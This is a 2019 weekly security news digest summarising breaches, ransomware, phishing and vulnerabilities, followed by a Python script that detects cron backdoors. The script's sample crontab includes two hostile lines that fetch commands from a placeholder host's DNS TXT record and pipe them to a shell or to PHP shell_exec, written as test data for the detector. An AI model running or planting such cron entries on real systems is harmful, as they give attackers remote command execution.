45 Security breaches Worldwide – Week 19, 2019
Be informed about the latest 45 security breaches worldwide, identified and reported publicly during Week 19, 2019. Security-related breaches have a severe negative impact on any business; consider a security audit to prevent similar cases.
- BC Hydro is seeing a lot of spoofing/phishing emails.
- BC Hydro has issued a warning after it received reports of a new twist on an email scam targeting its customers. The fraudulent messages ask customers to click a link and enter their bank information to access a refund, according to the utility. BC Hydro scam targeting customers on an ‘unprecedented’ scale, utility warns
- GPS units can be easily spoofed
- Driving downtown, you glance at your navigation app and see that it thinks that you are at the airport. A bit unsettling, no doubt. Is it possible to guard against GPS attacks?
- For the privacy paranoids
- Google has added a new option to completely delete your location history and activities. Google Adds New Option to ‘Auto-Delete’ Your Location History and Activity Data
- Retefe is a banking Trojan that was on the rise in Switzerland and Germany last month.
- It is hitting both Windows and Mac targets. It has updated tactics, a new loader and infection vector that uses a phony shareware utility called Convert PDF to Word. 2019: The Return of Retefe
- A report on the latest phishing trends shows that social media has seen the biggest growth since last quarter, with a 75% increase.
- Microsoft is still the most phished brand, helped by an easily constructed phony login page for O365, along with copious credential thefts and reused passwords. Phishing is also more prevalent on Mondays and Tuesdays. Phishers’ Favorites: It’s Lonely at the Top: Microsoft Remains the #1 Impersonated Brand in Phishing Attacks
- Here is a technical explanation of how Facebook intentionally circumvented its own privacy controls to share data with its partners and how apps can make tons of cash selling this supposedly private data.
- Along the way, the company took advantage of regulators’ ignorance of its technology to sell your data by ignoring everyone’s sharing settings. “Zuckerberg calling for a new era of true data portability is no different from the meth dealer demanding the keys to the drug locker.” Deceit By Design: Zuck’s Dirty Secret He Doesn’t Want You To Know
- A new malware encyclopedia is now out from CheckPoint devoted just to macOS malware.
- You can dig deeper into how the code works, with links to signatures, events and samples. This should finally put to rest the notion that Macs are immune from malware. macOS Malware Encyclopedia
- Coinminers are still very much with us, even though one of the major players, Coinhive, was taken down in March.
- Researchers are still seeing remnants of its malware code on tens of thousands of computers, trying to phone home unsuccessfully. Coinhive’s major competitor, CryptoLoot, is still active with 1 million daily requests across the Internet. Cryptojacking in the post-Coinhive era
- More than 50,000 customers of SAP are open to attack, according to researchers.
- The issue is that errors in SAP NetWeaver configuration settings can be used to compromise applications. They are calling this exploit 10kBlaze and more than a dozen SAP products are affected. You’ll want to patch them asap. Protection from a Cyber Exploit With the Power to Burn Financial Statements
- Most Dell Windows PCs are vulnerable to remote code execution attacks, thanks to Dell’s SupportAssist application.
- This software is used for remote technical support. A young researcher discovered the issue, which can be exploited using ARP and DNS spoofing. Remote Code Execution on most Dell computers and Automated, proactive and predictive …..
- The job listings site Ladders left an unsecured ElasticSearch database which contained details on 13 million resumes and current salaries.
- It was quickly protected after reporters notified the company. Job recruitment site Ladders exposed 13 million user profiles
- Researchers have found a new variant of the Shellbot cryptominer.
- It uses a well-known SSH brute force technique to break into Linux servers with weak passwords to mine cryptocurrency. The team observed that the code was actively being updated with new obfuscation methods. A Threat Stack SOC Analysis: The Continuing Evolution of the Shellbot Cryptomining Malware
- Barracuda researchers have revealed a startling rise in account takeover.
- A recent analysis of account-takeover attacks targeted at Barracuda customers found that 29 percent of organizations had their Office 365 accounts compromised by hackers in March 2019. More than 1.5 million malicious and spam emails were sent from the hacked Office 365 accounts in that one month! Threat Spotlight: Account Takeover
- It appears the “backdoor” to Huawei routers is nothing more than telnet.
- The mistaken reveal got a UK minister sacked this week. We all want to see hard proof of deliberate espionage. This is absolutely not it. Oh dear. Secret Huawei enterprise router snoop ‘backdoor’ was Telnet service, sighs Vodafone
- Implementations of several versions of OpenPGP and S/MIME have vulnerabilities in their email signature verification code that could allow for spoofing of the messages.
- A team of German academic researchers found five different attack methods among 14 different email clients. They label the effort “Johnny You Are Fired” and propose a series of mitigations, most of which have already been implemented by the email vendors. Artifacts for the USENIX publication
- Malware is more frequently designed to detect and evade sandboxes, which are often used by researchers.
- One way to do this is simply to use tools to inspect Registry keys for the preferred language. Malware sandbox detection and evasion
- Beware of the third-party Smart Content Android App Store.
- It contains nothing but Trojans and malware. You should probably stick with Google Play and be safe. From third-party Android store to SMS Trojan
- Hackers used password spraying to steal documents from Citrix’ internal network.
- They had access for several months before being notified by the FBI about the breach in March. The company notified the California Attorney General of the breach earlier this week. Citrix provides update on unauthorized internal network access and Citrix letter to California attorney general
- A major German IT infrastructure provider has been hit by hackers.
- Data from Citycomp’s network was stolen and posted online in an attempt to extort funds. The firm supplies computer equipment to some of the world’s largest companies, including Oracle and Airbus. The data dump is supposedly more than 500 GB and includes data from the German branch offices of Citycomp’s customers. Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies
- Nine men were arrested for stealing millions through phony emails to numerous businesses.
- They used a combination of scams, including a phony Russian oil scheme and digital romance-blackmails. These all happened in July 2016 and the men were arrested in Texas, Florida and New York. Each is charged with one count of conspiring to commit wire fraud. Nine Defendants Arrested In New York, Florida, And Texas For Multimillion-Dollar Wire Fraud Scheme
The remaining security breaches below also made news headlines. All of these happened just last week.
- At the beginning of the year, the EU announced a massive bug bounty program with nearly US$1M in rewards.
- They were quickly hit with a backlash because of a lack of resources to help open source project maintainers. This post explains some of the other, darker issues around bounty programs, and shows how it isn’t just about finding the bugs but about having follow-ups and fixes too. EU offers bug bounties on popular open source software and Amid Bug Bounty Hype, Sometimes Security is Left in the Dust
- The Swarm, Ansible and GitLab Jenkins plug-ins have significant bugs that could allow attackers to gain access to the central server.
- All three have been updated recently, thanks to this research. Vulnerability Spotlight: Multiple bugs in several Jenkins plugins
- Magecart card skimming injections labeled MirrorThief have compromised more than 200 on-campus online stores.
- The issue was in the e-commerce platform PrismWeb, sold by the Nebraska Book Company. They have released an update and users should deploy it immediately. Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada
- Yesterday the latest Verizon 2019 Data Breach Investigations Report was released.
- It contains information on more than 2,000 confirmed data breaches seen during 2018, taken from more than 70 different reporting sources and analyzing more than 40,000 separate security incidents. 2019 Data Breach Investigations Report (pdf)
- Hackers were able to steal the equivalent of $45M+ from the Binance cryptocurrency exchange.
- The bitcoins were stolen using phishing and malware, and the company pledged it would reimburse the rightful account owners. This blog post announces a temporary suspension of deposits and withdrawals (but not trading), explains what happened and describes how the exchange is dealing with the theft. Binance Security Breach Update
- The city of Baltimore, Maryland suffered a RobbinHood ransomware attack on May 7 that knocked out the majority of city servers and some government applications.
- Various city services aren’t yet working, according to this report. Hackers demanded the equivalent of an $80,000 payment, and so far officials have refused to pay. This was the second ransom attack on the city: last year its 911 ops center was hit. Baltimore City Hall Computer Network Infected With Ransomware Virus, Officials Say
- A new variant of Dharma ransomware has been found that includes an installation of an ESET software removal tool.
- This distracts users from its background malicious activities. Dharma Ransomware Uses AV Tool to Distract from Malicious Activities
- A massive SMS spamming operation was uncovered, containing data on 80M people.
- It has been responsible for sending millions of texts trying to lure victims into revealing their online credentials. Ironically, they failed to password protect their server, and a researcher posted the details about their operation. Massive SMS Bombing Operation Uncovered In Passwordless Database
- Canada’s 4th largest mobile provider Freedom Mobile had an unprotected ElasticSearch storage bucket containing 5M log entries of customer data.
- Credit cards and CVV numbers were included. Eventually, the company set up a password on the server. Freedom Mobile Data Breach Exposes Canadian Customers’ Full Credit Details
- The accounting software company Wolters Kluwer has confirmed its servers were taken offline thanks to a malware attack.
- They sell the CCH service and stated that no customer data was compromised. Krebs has more details here. Public Statement – Network and Service Interruptions and Updated this story to include the latest statement from Wolters Kluwer
- The Turla group of Russian hackers has developed a new exploit called LightNeuron.
- It was specifically designed for Microsoft Exchange email servers and works as an MTA. It is delivered via infected PDF and JPG attachments. Turla LightNeuron: One email away from remote code execution
- ISPsystem is a web-based control panel used by numerous hosting providers and their customers.
- Researchers found several bugs that could allow hackers to hijack sessions and take control over a user’s websites. The company fixed the problem and issued a patch with v.5.178.2, and users should upgrade. Vulnerabilities in ISPsystem
- WordPress is releasing a new version today that will include screening for supply-chain attacks, which are on the rise.
- The new version checks for code signatures to ensure plug-in integrity. Users should update to v.5.2 asap. The feature will prevent threat actors from issuing a mass update pushing malicious code onto all installations after taking control of the WordPress infrastructure. WordPress Supply Chain Attacks: An Emerging Threat and WordPress 5.2: Mitigating Supply-Chain Attacks Against 33% of the Internet
- The median number of days to discover an external cyber intrusion dropped from 83 days in 2017 to 55 days in 2018, according to a new report from Trustwave.
- While that is good news, the evidence of some attackers wasn’t found for more than a year. And to make matters worse, the portion of all incoming email that was spam rose from a third of all messages in 2017 to close to 90% last year. 2019 Trustwave Global Security Report (pdf)
- Malware writers are using various cloud services to hide their command infrastructure and code.
- This post summarizes two of these methods nicely. For example, tech support scams are being hosted on IaaS object stores, using arbitrary host names to make them harder to spot. And G Docs are being used to create phishing templates and hide the malicious URLs behind them. This means defenders will have to up their game on content filtering and use better analysis to figure these ploys out. Old Scams Getting New Life in the Cloud
- Israeli air strike on Gazan cyber offices.
- Many infosec reporters posted items yesterday and claimed this was a significant event in bridging cyber and kinetic warfare. This law professor says the action wasn’t all that big a deal, and certainly not historic. Crossing a Cyber Rubicon? Overreactions to the IDF’s Strike on the Hamas Cyber Facility
- Chrissy Morgan has posted the recording of an hour-long talk on responsible disclosures she recently gave at Le Tour Du Hack.
- She discusses the context of some significant disclosures and what researchers did correctly and incorrectly. Le Tour Du Hack 2019: The Good, The Bad And The Ugly Of Responsible Disclosure – Chrissy Morgan
- The malware stealers Hawkeye and FormBook have also been upgraded.
- They both have added new and improved obfuscation methods. SentinelOne has the details on FormBook; MyOnlineSecurity has the details on Hawkeye, which now looks for running analysis processes or VMs. FORMBOOK | YET ANOTHER STEALER MALWARE and Hawkeye keylogger using fileless delivery system via Amazon AWS
- Are you still thinking BYOD is secure enough?
- Maybe you need to better understand what the zero-trust model is and how to implement it with less risk. The importance of zero-trust in a BYOD environment
- GPS apps to locate equipment and employees
- The U.S. Global Positioning System, part of a network of global navigation satellite systems (GNSS), is vulnerable to attacks that could disrupt many industries. Here’s how it works and what you can do to mitigate its risk. What is GPS spoofing? And how you can defend against it
- Chinese state-sponsored hackers acquired the EternalSynergy and DoublePulsar hacking tools from the NSA.
- This was done in 2016, a year before the Shadow Brokers first leaked these tools across the Internet. The hackers used these tools to invade numerous business and government networks around the world. It isn’t known how they obtained these tools. Buckeye: Espionage Outfit Used Equation Group Tools Prior to Shadow Brokers Leak
- Ransomware is now so common that it is even a subject of a segment on this week’s 60 Minutes.
- But a new ploy is leveraging Git-based services, replacing the contents of various source code repositories with a ransom note. Poor password hygiene is the cause. The files aren’t deleted, just their headers, and they can be restored. Almost 400 projects have been affected so far. A hacker is wiping Git repositories and asking for a ransom
- Attackers are using the PHP shell_exec function to kick off cron jobs that add malware backdoors.
- What is intriguing about this attack is that the hackers are storing their commands in a DNS TXT record. Cronjob Backdoors
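The cron-plus-DNS-TXT pattern in the item above is easy to hunt for on a server. The following detection script is an added example written for this digest, not code from the original post or from the linked write-up; the crontab content is constructed, and the domain cmd.example.invalid is a placeholder.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab content (not from the original post): two routine
# entries plus two that follow the pattern described above, where a cron job
# fetches a command string from a DNS TXT record and hands it to a shell or
# to PHP's shell_exec(). The domain is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/5 * * * * dig +short TXT cmd.example.invalid | sh
* * * * * php -r 'shell_exec(dns_get_record("cmd.example.invalid", DNS_TXT)[0]["txt"]);'
"""

# Each rule is (name, compiled pattern). They are deliberately narrow so that
# ordinary cron entries (log rotation, backups) do not trip them.
RULES = [
    ("dns_txt_lookup", re.compile(r"\b(dig|nslookup|host)\b[^|;&]*\bTXT\b|dns_get_record\s*\([^)]*DNS_TXT")),
    ("piped_to_shell", re.compile(r"\|\s*(sh|bash|dash|zsh)\b")),
    ("php_shell_exec", re.compile(r"\bshell_exec\s*\(")),
]

@dataclass
class Finding:
    line_no: int      # 1-based line within the crontab text
    command: str      # the command part of the cron entry
    rules: list       # names of the rules that matched

def parse_cron_line(line):
    """Return the command part of a crontab line, or None for comments, blanks and VAR=value lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    if stripped.startswith("@"):                 # @reboot, @daily, ... have one schedule field
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) > 1 else None
    parts = stripped.split(None, 5)              # five schedule fields, then the command
    return parts[5] if len(parts) == 6 else None

def scan_crontab(text):
    """Scan crontab text and return a Finding for every entry that matches at least one rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = parse_cron_line(line)
        if cmd is None:
            continue
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append(Finding(n, cmd, hits))
    return findings

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {', '.join(f.rules)} :: {f.command}")
```

Point it at the output of `crontab -l` for each user and at the files under /etc/cron.d; an entry that both performs a TXT lookup and pipes into a shell deserves an immediate look.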
- The banking Trojan QakBot is back in the news.
- It has a better way to persist after reboots that makes detection harder. Qakbot levels up with new obfuscation techniques
- Late last week, Firefox inadvertently prevented add-ons from running.
- The issue had to do with how the certificate signing was handled, and an update, v.66.0.4, should fix the problem, provided you have set your Studies option to enable updates. Firefox v.65 patched another security bug, a write-after-free, last month. CVE-2018-18500: write-after-free vulnerability in Firefox, Analysis and Exploitation